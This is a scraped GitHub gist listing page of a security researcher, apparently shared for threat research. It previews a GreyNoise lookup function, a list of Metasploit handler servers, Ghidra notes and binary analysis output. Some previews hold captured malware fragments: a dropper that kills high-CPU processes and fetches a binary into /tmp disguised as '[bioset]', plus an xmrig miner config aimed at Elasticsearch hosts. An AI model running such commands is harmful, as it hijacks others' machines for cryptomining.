Skip to content

Instantly share code, notes, and snippets.

Remco Verhoef nl5887

Block or report user

Report or block nl5887

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
nl5887 / gist:0a55e297aad9bf5f4882deb44ea0ef79
Created Mar 18, 2019
fish function to query greynoise for specific ip
View gist:0a55e297aad9bf5f4882deb44ea0ef79
function greynoise
if test (count $argv) -eq 0
echo "No arguments specified. Usage:\necho greynoise {ip}"
return 1
set ip $argv[1]
curl -s -XPOST -d "ip=$ip" ''|jq '.'
nl5887 /
Last active Apr 18, 2019
Metasploit Meterpreter handler servers (HTTP/HTTPS)

This gist contains a list of verified Metasploit Meterpreter http(s) handlers and Powershell Empire http(s) listeners.

Servers could be malicious, or just part of a red teaming action.

Thanks to and Jose.

nl5887 /
Last active Jun 4, 2019
Ghidra decompile

Ghydra decompiler

This python script communicates with the Ghydra decompiler. Currently it succeeds in communicating, sending hardcoded opcodes and returning decompiled code.

Currently working on reversing the getPcodePacked command.

Next steps:

  • implement exception handling
  • implement callbacks
  • allow decompilation of custom payloads
View all
ps aux |awk '$3>40.0{print $2}'|xargs kill -9
cd /tmp
if [ $? -ne 0 ]
export PATH=`pwd`:$PATH
export PATH=/tmp:$PATH
wget -q -O \[bioset\] || curl -s -o \[bioset\]
chmod +x \[bioset\]
View a
# Edit
# Stop editing now
BINARIES="arm arm7 arm64"
for Binary in $BINARIES; do
View gist:e7b044f7d264dba7d88daed49a3c084e
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2012-2017 Matt Martz
# All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
View gist:9cb88cf2ef9849d3873b611bce3b0aaa
View gist:9f3413ed486b117134c59aa4daee17b8
MD5 (/Users/remco/Downloads/paimon.x86) = 5efce325c5aa2fa11553bf6a4bd94b74
arch x86
baddr 0x8048000
binsz 37184
bintype elf
bits 32
canary false
sanitiz false
class ELF32
nl5887 / config.json
Last active Nov 29, 2018
Targetting Elasticsearch
View config.json
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 3, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 65, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
You can’t perform that action at this time.